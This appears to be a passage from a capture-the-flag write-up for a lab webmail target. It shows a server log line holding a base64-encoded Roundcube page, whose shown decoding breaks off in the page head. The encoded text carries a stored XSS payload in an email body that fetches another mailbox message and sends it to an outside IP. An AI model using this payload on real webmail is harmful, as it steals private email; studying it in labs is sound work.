zLGV2ZW50KSI+PHNwYW4gY2xhc3M9ImlubmVyIj5QcmludDwvc3Bhbj48L2E+CgkKCQoJPGEgaWQ9Im1hcmttZXNzYWdlbWVudWxpbmsiIGNsYXNzPSJtYXJrbWVzc2FnZSIgdGl0bGU9Ik1hcmsgbWVzc2FnZXMiIGRhdGEtcG9wdXA9Im1hcmttZXNzYWdlLW1lbnUiIHJvbGU9ImJ1dHRvbiIgaHJlZj0iIyI+PHNwYW4gY2xhc3M9ImlubmVyIj5NYXJrPC9zcGFuPjwvYT4KCTxhIGlkPSJtZXNzYWdlbWVudWxpbmsiIGNsYXNzPSJtb3JlIiB0aXRsZT0iTW9yZSBhY3Rpb25zLi4uIiBkYXRhLXBvcHVwPSJtZXNzYWdlLW1lbnUiIHJvbGU9ImJ1dHRvbiIgaHJlZj0iIyI+PHNwYW4gY2xhc3M9ImlubmVyIj5Nb3JlPC9zcGFuPjwvYT4KCQoJCTxzcGFuIGNsYXNzPSJzcGFjZXIiPjwvc3Bhbj4KCQk8YSBjbGFzcz0icHJldiBkaXNhYmxlZCIgdGl0bGU9IlNob3cgcHJldmlvdXMgbWVzc2FnZSIgZGF0YS1oaWRkZW49InNtYWxsIiBpZD0icmNtYnRuMTA2IiByb2xlPSJidXR0b24iIHRhYmluZGV4PSItMSIgYXJpYS1kaXNhYmxlZD0idHJ1ZSIgaHJlZj0iIyIgb25jbGljaz0icmV0dXJuIHJjbWFpbC5jb21tYW5kKCdwcmV2aW91c21lc3NhZ2UnLCcnLHRoaXMsZXZlbnQpIj48c3BhbiBjbGFzcz0iaW5uZXIiPlByZXZpb3VzPC9zcGFuPjwvYT4KCQk8YSBjbGFzcz0ibmV4dCBkaXNhYmxlZCIgdGl0bGU9IlNob3cgbmV4dCBtZXNzYWdlIiBkYXRhLWhpZGRlbj0ic21hbGwiIGlkPSJyY21idG4xMDciIHJvbGU9ImJ1dHRvbiIgdGFiaW5kZXg9Ii0xIiBhcmlhLWRpc2FibGVkPSJ0cnVlIiBocmVmPSIjIiBvbmNsaWNrPSJyZXR1cm4gcmNtYWlsLmNvbW1hbmQoJ25leHRtZXNzYWdlJywnJyx0aGlzLGV2ZW50KSI+PHNwYW4gY2xhc3M9ImlubmVyIj5OZXh0PC9zcGFuPjwvYT4KCQo8L2Rpdj4KCjxkaXYgaWQ9ImZvcndhcmQtbWVudSIgY2xhc3M9InBvcHVwbWVudSI+Cgk8aDMgaWQ9ImFyaWEtbGFiZWwtZm9yd2FyZC1tZW51IiBjbGFzcz0idm9pY2UiPkZvcndhcmRpbmcgb3B0aW9uczwvaDM+Cgk8dWwgY2xhc3M9Im1lbnUgbGlzdGluZyIgcm9sZT0ibWVudSIgYXJpYS1sYWJlbGxlZGJ5PSJhcmlhLWxhYmVsLWZvcndhcmQtbWVudSI+CgkJPGxpIHJvbGU9Im1lbnVpdGVtIj48YSBjbGFzcz0iZm9yd2FyZCBpbmxpbmUgZGlzYWJsZWQiIGlkPSJyY21idG4xMDgiIHJvbGU9ImJ1dHRvbiIgdGFiaW5kZXg9Ii0xIiBhcmlhLWRpc2FibGVkPSJ0cnVlIiBocmVmPSIjIiBvbmNsaWNrPSJyZXR1cm4gcmNtYWlsLmNvbW1hbmQoJ2ZvcndhcmQtaW5saW5lJywnc3ViJyx0aGlzLGV2ZW50KSI+Rm9yd2FyZCBpbmxpbmU8L2E+PC9saT4KCQk8bGkgcm9sZT0ibWVudWl0ZW0iPjxhIGNsYXNzPSJmb3J3YXJkIGF0dGFjaG1lbnQgZGlzYWJsZWQiIGlkPSJyY21idG4xMDkiIHJvbGU9ImJ1dHRvbiIgdGFiaW5kZXg9Ii0xIiBhcmlhLWRpc2FibGVkPSJ0cnVlIiBocmVmPSIjIiBvbmNsaWNrPSJyZXR1cm4gcmNtYWlsLmNvbW1hbmQoJ2ZvcndhcmQtYXR0YWNobWVudCcsJ3N1YicsdGhpcyxldmVudCkiPkZvcndhcmQgYXMgYXR0YWNobWVudDwvYT48L2xpPgoJCTxsaSByb2xlPSJtZW51aXRlbSI+PGEgY2xhc3M9ImZvcndhcmQgYm91bmNlIGRpc2FibGVkIiBpZD0icmNtYnRuMTEwIiByb2xlPSJidXR0b24iIHRhYmluZGV4PSItMSIgYXJpYS1kaXNhYmxlZD0idHJ1ZSIgaHJlZj0iIyIgb25jbGljaz0icmV0dXJuIHJjbWFpbC5jb21tYW5kKCdib3VuY2UnLCcnLHRoaXMsZXZlbnQpIj5SZXNlbmQgKGJvdW5jZSk8L2E+PC9saT4KCQkKCTwvdWw+CjwvZGl2PgoKPGRpdiBpZD0icmVwbHlhbGwtbWVudSIgY2xhc3M9InBvcHVwbWVudSI+Cgk8aDMgaWQ9ImFyaWEtbGFiZWwtcmVwbHlhbGwtbWVudSIgY2xhc3M9InZvaWNlIj5SZXBseS1hbGwgb3B0aW9uczwvaDM+Cgk8dWwgY2xhc3M9Im1lbnUgbGlzdGluZyIgcm9sZT0ibWVudSIgYXJpYS1sYWJlbGxlZGJ5PSJhcmlhLWxhYmVsLXJlcGx5YWxsLW1lbnUiPgoJCTxsaSByb2xlPSJtZW51aXRlbSI+PGEgY2xhc3M9InJlcGx5IGFsbCBkaXNhYmxlZCIgaWQ9InJjbWJ0bjExMSIgcm9sZT0iYnV0dG9uIiB0YWJpbmRleD0iLTEiIGFyaWEtZGlzYWJsZWQ9InRydWUiIGhyZWY9IiMiIG9uY2xpY2s9InJldHVybiByY21haWwuY29tbWFuZCgncmVwbHktYWxsJywnc3ViJyx0aGlzLGV2ZW50KSI+UmVwbHkgYWxsPC9hPjwvbGk+CgkJPGxpIHJvbGU9Im1lbnVpdGVtIj48YSBjbGFzcz0icmVwbHkgbGlzdCBkaXNhYmxlZCIgaWQ9InJjbWJ0bjExMiIgcm9sZT0iYnV0dG9uIiB0YWJpbmRleD0iLTEiIGFyaWEtZGlzYWJsZWQ9InRydWUiIGhyZWY9IiMiIG9uY2xpY2s9InJldHVybiByY21haWwuY29tbWFuZCgncmVwbHktbGlzdCcsJ3N1YicsdGhpcyxldmVudCkiPlJlcGx5IGxpc3Q8L2E+PC9saT4KCQkKCTwvdWw+CjwvZGl2PgoKPGRpdiBpZD0ibWVzc2FnZS1tZW51IiBjbGFzcz0icG9wdXBtZW51Ij4KCTxoMyBpZD0iYXJpYS1sYWJlbC1tZXNzYWdlLW1lbnUiIGNsYXNzPSJ2b2ljZSI+TW9yZSBtZXNzYWdlIGFjdGlvbnM8L2gzPgoJPHVsIGNsYXNzPSJtZW51IGxpc3RpbmciIHJvbGU9Im1lbnUiIGFyaWEtbGFiZWxsZWRieT0iYXJpYS1sYWJlbC1tZXNzYWdlLW1lbnUiPgoJCTxsaSByb2xlPSJtZW51aXRlbSI+PGEgY2xhc3M9InByaW50IGRpc2FibGVkIiBkYXRhLWhpZGRlbj0ic21hbGwiIGlkPSJyY21idG4xMTMiIHJvbGU9ImJ1dHRvbiIgdGFiaW5kZXg9Ii0xIiBhcmlhLWRpc2FibGVkPSJ0cnVlIiBocmVmPSIjIiBvbmNsaWNrPSJyZXR1cm4gcmNtYWlsLmNvbW1hbmQoJ3ByaW50JywnJyx0aGlzLGV2ZW50KSI+UHJpbnQgdGhpcyBtZXNzYWdlPC9hPjwvbGk+CgkJCgkJPGxpIHJvbGU9Im1lbnVpdGVtIj48YSBjbGFzcz0iZG93bmxvYWQgZGlzYWJsZWQiIGlkPSJyY21idG4xMTQiIHJvbGU9ImJ1dHRvbiIgdGFiaW5kZXg9Ii0xIiBhcmlhLWRpc2FibGVkPSJ0cnVlIiBocmVmPSIjIiBvbmNsaWNrPSJyZXR1cm4gcmNtYWlsLmNvbW1hbmQoJ2Rvd25sb2FkJywnJyx0aGlzLGV2ZW50KSI+RXhwb3J0PC9hPjwvbGk+CgkJPGxpIHJvbGU9Im1lbnVpdGVtIj48YSBjbGFzcz0iZWRpdCBhc25ldyBkaXNhYmxlZCIgaWQ9InJjbWJ0bjExNSIgcm9sZT0iYnV0dG9uIiB0YWJpbmRleD0iLTEiIGFyaWEtZGlzYWJsZWQ9InRydWUiIGhyZWY9IiMiIG9uY2xpY2s9InJldHVybiByY21haWwuY29tbWFuZCgnZWRpdCcsJ25ldycsdGhpcyxldmVudCkiPkVkaXQgYXMgbmV3PC9hPjwvbGk+CgkJPGxpIHJvbGU9Im1lbnVpdGVtIj48YSBjbGFzcz0ic291cmNlIGRpc2FibGVkIiBpZD0icmNtYnRuMTE2IiByb2xlPSJidXR0b24iIHRhYmluZGV4PSItMSIgYXJpYS1kaXNhYmxlZD0idHJ1ZSIgaHJlZj0iIyIgb25jbGljaz0icmV0dXJuIHJjbWFpbC5jb21tYW5kKCd2aWV3c291cmNlJywnJyx0aGlzLGV2ZW50KSI+U2hvdyBzb3VyY2U8L2E+PC9saT4KCQk8bGkgcm9sZT0ibWVudWl0ZW0iPjxhIGNsYXNzPSJtb3ZlIGRpc2FibGVkIiBhcmlhLWhhc3BvcHVwPSJ0cnVlIiBpZD0icmNtYnRuMTE3IiByb2xlPSJidXR0b24iIHRhYmluZGV4PSItMSIgYXJpYS1kaXNhYmxlZD0idHJ1ZSIgaHJlZj0iIyIgb25jbGljaz0icmV0dXJuIHJjbWFpbC5jb21tYW5kKCdtb3ZlJywnJyx0aGlzLGV2ZW50KSI+PHNwYW4gY2xhc3M9ImZvbGRlci1zZWxlY3Rvci1saW5rIj5Nb3ZlIHRvLi4uPC9zcGFuPjwvYT48L2xpPgoJCTxsaSByb2xlPSJtZW51aXRlbSI+PGEgY2xhc3M9ImNvcHkgZGlzYWJsZWQiIGFyaWEtaGFzcG9wdXA9InRydWUiIGlkPSJyY21idG4xMTgiIHJvbGU9ImJ1dHRvbiIgdGFiaW5kZXg9Ii0xIiBhcmlhLWRpc2FibGVkPSJ0cnVlIiBocmVmPSIjIiBvbmNsaWNrPSJyZXR1cm4gcmNtYWlsLmNvbW1hbmQoJ2NvcHknLCcnLHRoaXMsZXZlbnQpIj48c3BhbiBjbGFzcz0iZm9sZGVyLXNlbGVjdG9yLWxpbmsiPkNvcHkgdG8uLi48L3NwYW4+PC9hPjwvbGk+CgkJPGxpIHJvbGU9Im1lbnVpdGVtIj48YSB0YXJnZXQ9Il9ibGFuayIgY2xhc3M9ImV4dHdpbiBkaXNhYmxlZCIgZGF0YS1oaWRkZW49InNtYWxsIiBpZD0icmNtYnRuMTE5IiByb2xlPSJidXR0b24iIHRhYmluZGV4PSItMSIgYXJpYS1kaXNhYmxlZD0idHJ1ZSIgaHJlZj0iIyIgb25jbGljaz0icmV0dXJuIHJjbWFpbC5jb21tYW5kKCdvcGVuJywnJyx0aGlzLGV2ZW50KSI+T3BlbiBpbiBuZXcgd2luZG93PC9hPjwvbGk+CgkJCgk8L3VsPgo8L2Rpdj4KCjxkaXYgaWQ9Im1hcmttZXNzYWdlLW1lbnUiIGNsYXNzPSJwb3B1cG1lbnUiPgoJPGgzIGlkPSJhcmlhLWxhYmVsLW1hcmttZXNzYWdlLW1lbnUiIGNsYXNzPSJ2b2ljZSI+TWFyayBzZWxlY3RlZCBtZXNzYWdlcyBhcy4uLjwvaDM+Cgk8dWwgY2xhc3M9Im1lbnUgbGlzdGluZyIgcm9sZT0ibWVudSIgYXJpYS1sYWJlbGxlZGJ5PSJhcmlhLWxhYmVsLW1hcmttZXNzYWdlLW1lbnUiPgoJCTxsaSByb2xlPSJtZW51aXRlbSI+PGEgY2xhc3M9InJlYWQgZGlzYWJsZWQiIGlkPSJyY21idG4xMjAiIHJvbGU9ImJ1dHRvbiIgdGFiaW5kZXg9Ii0xIiBhcmlhLWRpc2FibGVkPSJ0cnVlIiBocmVmPSIjIiBvbmNsaWNrPSJyZXR1cm4gcmNtYWlsLmNvbW1hbmQoJ21hcmsnLCdyZWFkJyx0aGlzLGV2ZW50KSI+QXMgcmVhZDwvYT48L2xpPgoJCTxsaSByb2xlPSJtZW51aXRlbSI+PGEgY2xhc3M9InVucmVhZCBkaXNhYmxlZCIgaWQ9InJjbWJ0bjEyMSIgcm9sZT0iYnV0dG9uIiB0YWJpbmRleD0iLTEiIGFyaWEtZGlzYWJsZWQ9InRydWUiIGhyZWY9IiMiIG9uY2xpY2s9InJldHVybiByY21haWwuY29tbWFuZCgnbWFyaycsJ3VucmVhZCcsdGhpcyxldmVudCkiPkFzIHVucmVhZDwvYT48L2xpPgoJCTxsaSByb2xlPSJtZW51aXRlbSI+PGEgY2xhc3M9ImZsYWcgZGlzYWJsZWQiIGlkPSJyY21idG4xMjIiIHJvbGU9ImJ1dHRvbiIgdGFiaW5kZXg9Ii0xIiBhcmlhLWRpc2FibGVkPSJ0cnVlIiBocmVmPSIjIiBvbmNsaWNrPSJyZXR1cm4gcmNtYWlsLmNvbW1hbmQoJ21hcmsnLCdmbGFnZ2VkJyx0aGlzLGV2ZW50KSI+QXMgZmxhZ2dlZDwvYT48L2xpPgoJCTxsaSByb2xlPSJtZW51aXRlbSI+PGEgY2xhc3M9InVuZmxhZyBkaXNhYmxlZCIgaWQ9InJjbWJ0bjEyMyIgcm9sZT0iYnV0dG9uIiB0YWJpbmRleD0iLTEiIGFyaWEtZGlzYWJsZWQ9InRydWUiIGhyZWY9IiMiIG9uY2xpY2s9InJldHVybiByY21haWwuY29tbWFuZCgnbWFyaycsJ3VuZmxhZ2dlZCcsdGhpcyxldmVudCkiPkFzIHVuZmxhZ2dlZDwvYT48L2xpPgoJCQoJCQoJPC91bD4KPC9kaXY+CgoKCgkJPC9kaXY+CgkKCTxkaXYgY2xhc3M9ImNvbnRlbnQgZnJhbWUtY29udGVudCIgcm9sZT0ibWFpbiI+CgkJPGRpdiBpZD0ibWVzc2FnZS1oZWFkZXIiPgoJCQk8aDIgY2xhc3M9InN1YmplY3QiPgoJCQkJPHNwYW4gY2xhc3M9InZvaWNlIj5TdWJqZWN0OiA8L3NwYW4+CgkJCQlDdXN0b21lciBJbmZvcm1hdGlvbiBSZXF1ZXN0CgkJCQkKCQkJPC9oMj4KCQkJPGRpdiBjbGFzcz0iaGVhZGVyIj4KCQkJCTxpbWcgc3JjPSIvP190YXNrPWFkZHJlc3Nib29rJmFtcDtfYWN0aW9uPXBob3RvJmFtcDtfZW1haWw9a3VqZW4lNDBkcmlwLmh0YiZhbXA7X2Vycm9yPTEmYW1wO19iZ2NvbG9yPXRyYW5zcGFyZW50IiBhbHQ9IkNvbnRhY3QgcGhvdG8iIGNsYXNzPSJjb250YWN0cGhvdG8iIG9uZXJyb3I9InRoaXMub25lcnJvciA9IG51bGw7IHRoaXMuc3JjID0gJ3NraW5zL2VsYXN0aWMvaW1hZ2VzL2NvbnRhY3RwaWMuc3ZnJzsiPgoJCQkJPGRpdiBjbGFzcz0iaGVhZGVyLWNvbnRlbnQiPgoJCQkJCTxkaXYgY2xhc3M9ImhlYWRlci1zdW1tYXJ5Ij48c3Bhbj5Gcm9tIDxzcGFuIGNsYXNzPSJhZHIiPjxhIGhyZWY9Im1haWx0bzprdWplbkBkcmlwLmh0YiIgY2xhc3M9InJjbUNvbnRhY3RBZGRyZXNzIiBvbmNsaWNrPSJyZXR1cm4gcmNtYWlsLmNvbW1hbmQoJ2NvbXBvc2UnLCdrdWplbiAmbHQ7a3VqZW5AZHJpcC5odGImZ3Q7Jyx0aGlzKSIgdGl0bGU9Imt1amVuQGRyaXAuaHRiIj5rdWplbjwvYT48YSBocmVmPSIjYWRkIiB0aXRsZT0iQWRkIHRvIGFkZHJlc3MgYm9vayIgY2xhc3M9InJjbWFkZGNvbnRhY3QiIG9uY2xpY2s9InJldHVybiByY21haWwuY29tbWFuZCgnYWRkLWNvbnRhY3QnLCdrdWplbiAmbHQ7a3VqZW5AZHJpcC5odGImZ3Q7Jyx0aGlzKSI+PC9hPjwvc3Bhbj4gb24gPHNwYW4gY2xhc3M9InRleHQtbm93cmFwIj4yMDI1LTAyLTEzIDEyOjMwPC9zcGFuPjwvc3Bhbj48L2Rpdj4KCQkJCQk8dGFibGUgY2xhc3M9ImhlYWRlci1oZWFkZXJzIj48dGJvZHk+PHRyPjx0ZCBjbGFzcz0iaGVhZGVyLXRpdGxlIj5Gcm9tPC90ZD48dGQgY2xhc3M9ImhlYWRlciBmcm9tIj48c3BhbiBjbGFzcz0iYWRyIj48YSBocmVmPSJtYWlsdG86a3VqZW5AZHJpcC5odGIiIGNsYXNzPSJyY21Db250YWN0QWRkcmVzcyIgb25jbGljaz0icmV0dXJuIHJjbWFpbC5jb21tYW5kKCdjb21wb3NlJywna3VqZW4gJmx0O2t1amVuQGRyaXAuaHRiJmd0OycsdGhpcykiIHRpdGxlPSJrdWplbkBkcmlwLmh0YiI+a3VqZW48L2E+PGEgaHJlZj0iI2FkZCIgdGl0bGU9IkFkZCB0byBhZGRyZXNzIGJvb2siIGNsYXNzPSJyY21hZGRjb250YWN0IiBvbmNsaWNrPSJyZXR1cm4gcmNtYWlsLmNvbW1hbmQoJ2FkZC1jb250YWN0Jywna3VqZW4gJmx0O2t1amVuQGRyaXAuaHRiJmd0OycsdGhpcykiPjwvYT48L3NwYW4+PC90ZD48L3RyPjx0cj48dGQgY2xhc3M9ImhlYWRlci10aXRsZSI+VG88L3RkPjx0ZCBjbGFzcz0iaGVhZGVyIHRvIj48c3BhbiBjbGFzcz0iYWRyIj48YSBocmVmPSJtYWlsdG86YmNhc2VAZHJpcC5odGIiIGNsYXNzPSJyY21Db250YWN0QWRkcmVzcyIgb25jbGljaz0icmV0dXJuIHJjbWFpbC5jb21tYW5kKCdjb21wb3NlJywnYmNhc2VAZHJpcC5odGInLHRoaXMpIiB0aXRsZT0iYmNhc2VAZHJpcC5odGIiPmJjYXNlQGRyaXAuaHRiPC9hPjxhIGhyZWY9IiNhZGQiIHRpdGxlPSJBZGQgdG8gYWRkcmVzcyBib29rIiBjbGFzcz0icmNtYWRkY29udGFjdCIgb25jbGljaz0icmV0dXJuIHJjbWFpbC5jb21tYW5kKCdhZGQtY29udGFjdCcsJ2JjYXNlQGRyaXAuaHRiJyx0aGlzKSI+PC9hPjwvc3Bhbj48L3RkPjwvdHI+PHRyPjx0ZCBjbGFzcz0iaGVhZGVyLXRpdGxlIj5SZXBseS1UbzwvdGQ+PHRkIGNsYXNzPSJoZWFkZXIgcmVwbHl0byI+PHNwYW4gY2xhc3M9ImFkciI+PGEgaHJlZj0ibWFpbHRvOmt1amVuQGRyaXAuaHRiIiBjbGFzcz0icmNtQ29udGFjdEFkZHJlc3MiIG9uY2xpY2s9InJldHVybiByY21haWwuY29tbWFuZCgnY29tcG9zZScsJ2t1amVuQGRyaXAuaHRiJyx0aGlzKSIgdGl0bGU9Imt1amVuQGRyaXAuaHRiIj5rdWplbkBkcmlwLmh0YjwvYT48YSBocmVmPSIjYWRkIiB0aXRsZT0iQWRkIHRvIGFkZHJlc3MgYm9vayIgY2xhc3M9InJjbWFkZGNvbnRhY3QiIG9uY2xpY2s9InJldHVybiByY21haWwuY29tbWFuZCgnYWRkLWNvbnRhY3QnLCdrdWplbkBkcmlwLmh0YicsdGhpcykiPjwvYT48L3NwYW4+PC90ZD48L3RyPjx0cj48dGQgY2xhc3M9ImhlYWRlci10aXRsZSI+RGF0ZTwvdGQ+PHRkIGNsYXNzPSJoZWFkZXIgZGF0ZSI+VG9kYXkgMTI6MzA8L3RkPjwvdHI+PC90Ym9keT48L3RhYmxlPgoJCQkJCTxkaXYgY2xhc3M9ImhlYWRlci1saW5rcyI+CgkJCQkJCQoJCQkJCQkKCQkJCQkJPGEgaHJlZj0iI2hlYWRlcnMiIGNsYXNzPSJoZWFkZXJzLXN1bW1hcnkiIG9uY2xpY2s9InJldHVybiBVSS5oZWFkZXJzX3Nob3codHJ1ZSkiPjwvYT4KCQkJCQkJPGEgaHJlZj0iI2FsbC1oZWFkZXJzIiBjbGFzcz0iaGVhZGVycy1hbGwiIG9uY2xpY2s9InJldHVybiBVSS5oZWFkZXJzX2RpYWxvZygpIj5IZWFkZXJzPC9hPgoJCQkJCQkKCQkJCQkJCgkJCQkJCQk8YSBjbGFzcz0icGxhaW4iIHRpdGxlPSJEaXNwbGF5IGluIHBsYWluIHRleHQgZm9ybWF0IiBpZD0icmNtYnRuMTI0IiByb2xlPSJidXR0b24iIGhyZWY9IiMiIG9uY2xpY2s9InJldHVybiByY21haWwuY29tbWFuZCgnY2hhbmdlLWZvcm1hdCcsJ3RleHQnLHRoaXMsZXZlbnQpIj48c3BhbiBjbGFzcz0iaW5uZXIiPlBsYWluIHRleHQ8L3NwYW4+PC9hPgoJCQkJCQkKCQkJCQkJCgkJCQkJPC9kaXY+CgkJCQk8L2Rpdj4KCQkJPC9kaXY+CgkJPC9kaXY+CgkJPGRpdiBpZD0ibWVzc2FnZS1jb250ZW50Ij4KCQkJPGRpdiBjbGFzcz0ibGVmdGNvbCIgcm9sZT0icmVnaW9uIiBhcmlhLWxhYmVsbGVkYnk9ImFyaWEtbGFiZWwtbWVzc2FnZWF0dGFjaG1lbnRzIj4KCQkJCTxoMiBpZD0iYXJpYS1sYWJlbC1tZXNzYWdlYXR0YWNobWVudHMiIGNsYXNzPSJ2b2ljZSI+QXR0YWNobWVudHM8L2gyPgoJCQkJCgkJCTwvZGl2PgoJCQk8ZGl2IGNsYXNzPSJyaWdodGNvbCIgcm9sZT0icmVnaW9uIiBhcmlhLWxhYmVsbGVkYnk9ImFyaWEtbGFiZWwtbWVzc2FnZWJvZHkiPgoJCQkJPGgyIGlkPSJhcmlhLWxhYmVsLW1lc3NhZ2Vib2R5IiBjbGFzcz0idm9pY2UiPk1lc3NhZ2UgQm9keTwvaDI+CgkJCQk8ZGl2IGlkPSJtZXNzYWdlLW9iamVjdHMiPgo8ZGl2IGlkPSJyZW1vdGUtb2JqZWN0cy1tZXNzYWdlIiBjbGFzcz0ibm90aWNlIiBzdHlsZT0iZGlzcGxheTogbm9uZSI+PHNwYW4+VG8gcHJvdGVjdCB5b3VyIHByaXZhY3kgcmVtb3RlIHJlc291cmNlcyBoYXZlIGJlZW4gYmxvY2tlZC48L3NwYW4+Jm5ic3A7PHNwYW4gY2xhc3M9ImJveGJ1dHRvbnMiPjxhIGhyZWY9IiNsb2FkcmVtb3RlIiBvbmNsaWNrPSJyY21haWwuY29tbWFuZCgnbG9hZC1yZW1vdGUnKSI+QWxsb3c8L2E+PC9zcGFuPjwvZGl2Pgo8L2Rpdj4KCQkJCTxkaXYgaWQ9Im1lc3NhZ2Vib2R5Ij48ZGl2IGNsYXNzPSJtZXNzYWdlLWh0bWxwYXJ0IiBpZD0ibWVzc2FnZS1odG1scGFydDEiIHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOiBmb28iPjwhLS0gaHRtbCBpZ25vcmVkIC0tPjwhLS0gaGVhZCBpZ25vcmVkIC0tPjwhLS0gbWV0YSBpZ25vcmVkIC0tPjxkaXYgY2xhc3M9InJjbUJvZHkiIHRpdGxlPSIgbmFtZT0iYmFyIHN0eWxlPWFuaW1hdGlvbi1uYW1lOnByb2dyZXNzLWJhci1zdHJpcGVzIG9uYW5pbWF0aW9uc3RhcnQ9ZmV0Y2goJiMwMzk7Lz9fdGFzaz1tYWlsJmFtcDtfYWN0aW9uPXNob3cmYW1wO191aWQ9MyZhbXA7X21ib3g9SU5CT1gmYW1wO19leHR3aW49MSYjMDM5OykudGhlbihyPSZndDtyLnRleHQoKSkudGhlbih0PSZndDtmZXRjaChgaHR0cDovLzEwLjEwLjE2LjIwL2M9JHtidG9hKHQpfWApKSAgZm9vPWJhciI+Rm9vPC9kaXY+CgoKCgoKCgoKCkNvbmZpZGVudGlhbGl0eSBOb3RpY2U6IFRoaXMgZWxlY3Ryb25pYyBjb21tdW5pY2F0aW9uIG1heSBjb250YWluIGNvbmZpZGVudGlhbCBvciBwcml2aWxlZ2VkIGluZm9ybWF0aW9uLiBBbnkgdW5hdXRob3JpemVkIHJldmlldywgdXNlLCBkaXNjbG9zdXJlLCBjb3B5aW5nLCBkaXN0cmlidXRpb24sIG9yIHRha2luZyBvZiBhbnkgcGFydCBvZiB0aGlzIGVtYWlsIGlzIHN0cmljdGx5IHByb2hpYml0ZWQuCklmIHlvdSBzdXNwZWN0IHRoYXQgeW91J3ZlIHJlY2VpdmVkIGEgJnF1b3Q7cGhpc2hpbmcmcXVvdDsgZS1tYWlsLCBwbGVhc2UgZm9yd2FyZCB0aGUgZW50aXJlIGVtYWlsIHRvIG91ciBzZWN1cml0eSBlbmdpbmVlciBhdCBiY2FzZUBkcmlwLmh0YjwvZGl2PjwvZGl2PgoJCQk8L2Rpdj4KCQk8L2Rpdj4KCTwvZGl2Pgo8L2Rpdj4KCjwhLS0gcG9wdXAgbWVudXMgLS0+CjxkaXYgaWQ9ImF0dGFjaG1lbnRtZW51IiBjbGFzcz0icG9wdXBtZW51Ij4KCTxoMyBpZD0iYXJpYS1sYWJlbC1hdHRhY2htZW50bWVudSIgY2xhc3M9InZvaWNlIj5BdHRhY2htZW50IG9wdGlvbnM8L2gzPgoJPHVsIGNsYXNzPSJtZW51IGxpc3RpbmciIHJvbGU9Im1lbnUiIGFyaWEtbGFiZWxsZWRieT0iYXJpYS1sYWJlbC1hdHRhY2htZW50bWVudSI+CgkJPGxpIHJvbGU9Im1lbnVpdGVtIj48YSBpZD0iYXR0YWNobWVudW9wZW4iIGNsYXNzPSJleHR3aW4gZGlzYWJsZWQiIHJvbGU9ImJ1dHRvbiIgdGFiaW5kZXg9Ii0xIiBhcmlhLWRpc2FibGVkPSJ0cnVlIiBocmVmPSIjIiBvbmNsaWNrPSJyZXR1cm4gcmNtYWlsLmNvbW1hbmQoJ29wZW4tYXR0YWNobWVudCcsJycsdGhpcyxldmVudCkiPk9wZW48L2E+PC9saT4KCQk8bGkgcm9sZT0ibWVudWl0ZW0iPjxhIGlkPSJhdHRhY2htZW51ZG93bmxvYWQiIGNsYXNzPSJkb3dubG9hZCBkaXNhYmxlZCIgcm9sZT0iYnV0dG9uIiB0YWJpbmRleD0iLTEiIGFyaWEtZGlzYWJsZWQ9InRydWUiIGhyZWY9IiMiIG9uY2xpY2s9InJldHVybiByY21haWwuY29tbWFuZCgnZG93bmxvYWQtYXR0YWNobWVudCcsJycsdGhpcyxldmVudCkiPkRvd25sb2FkPC9hPjwvbGk+CgkJCgk8L3VsPgo8L2Rpdj4KCjxkaXYgaWQ9Im1haWx0by1tZW51IiBjbGFzcz0icG9wdXBtZW51Ij4KCTxoMyBpZD0iYXJpYS1sYWJlbC1tYWlsdG9tZW51IiBjbGFzcz0idm9pY2UiPkVtYWlsIGFkZHJlc3Mgb3B0aW9uczwvaDM+Cgk8dWwgY2xhc3M9Im1lbnUgbGlzdGluZyIgcm9sZT0ibWVudSIgYXJpYS1sYWJlbGxlZGJ5PSJhcmlhLWxhYmVsLW1haWx0b21lbnUiPgoJCTxsaSByb2xlPSJtZW51aXRlbSI+PGEgY2xhc3M9ImFkZHJlc3Nib29rIiBpZD0icmNtYnRuMTI1IiByb2xlPSJidXR0b24iIHRhYmluZGV4PSItMSIgYXJpYS1kaXNhYmxlZD0idHJ1ZSIgaHJlZj0iIyI+QWRkIHRvIGFkZHJlc3MgYm9vazwvYT48L2xpPgoJCTxsaSByb2xlPSJtZW51aXRlbSI+PGEgY2xhc3M9ImNvbXBvc2UiIGlkPSJyY21idG4xMjYiIHJvbGU9ImJ1dHRvbiIgdGFiaW5kZXg9Ii0xIiBhcmlhLWRpc2FibGVkPSJ0cnVlIiBocmVmPSIjIj5Db21wb3NlIG1haWwgdG88L2E+PC9saT4KCQkKCTwvdWw+CjwvZGl2PgoKCjwvZGl2PgoKCgo8ZGl2IGlkPSJtZXNzYWdlc3RhY2siPjwvZGl2Pgo8c2NyaXB0PgokKGZ1bmN0aW9uKCkgewpyY21haWwuaW5pdCgpOwp9KTsKPC9zY3JpcHQ+CgoKCjxzY3JpcHQgc3JjPSJza2lucy9lbGFzdGljL2RlcHMvYm9vdHN0cmFwLmJ1bmRsZS5taW4uanM/cz0xNzE2MTA3MjQ1Ij48L3NjcmlwdD4KPHNjcmlwdCBzcmM9InNraW5zL2VsYXN0aWMvdWkubWluLmpzP3M9MTcxNjEwNzIzNyI+PC9zY3JpcHQ+Cgo8L2JvZHk+CjwvaHRtbD4= HTTP/1.1" 404 -

It decodes to:

<!DOCTYPE html>

<html lang="en">

<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>DripMail Webmail :: Customer Information Request</title>
	<meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no, maximum-scale=1.0"><meta name="theme-color" content="#f4f4f4"><meta name="msapplication-navbutton-color" content="#f4f4f4">
	<link rel="shortcut icon" href="skins/elastic/images/favicon.ico?s=1716107237">
	<link rel="stylesheet" href="skins/elastic/deps/bootstrap.min.css?s=1716107245">
	
		<link rel="stylesheet" href="skins/elastic/styles/styles.min.css?s=1716107237">
		
	
	
		<script>
		try {
			if (document.cookie.indexOf('colorMode=dark') > -1
				|| (document.cookie.indexOf('colorMode=light') === -1 && window.matchMedia('(prefers-color-scheme: dark)').matches)
			) {
				document.documentElement.className += ' dark-mode';
			}
		} catch (e) { }
		</script>
	
<link rel="stylesheet" type="text/css" href="plugins/jqueryui/themes/elastic/jquery-ui.min.css?s=1716107237"><script src="program/js/jquery.min.js?s=1716107242"></script><script src="program/js/common.min.js?s=1716107237"></script><script src="program/js/app.min.js?s=1716107237"></script><script>
/*
        @licstart  The following is the entire license notice for the 
        JavaScript code in this page.

        Copyright (C) The Roundcube Dev Team

        The JavaScript code in this page is free software: you can redistribute
        it and/or modify it under the terms of the GNU General Public License
        as published by the Free Software Foundation, either version 3 of
        the License, or (at your option) any later version.

        The code is distributed WITHOUT ANY WARRANTY; without even the implied
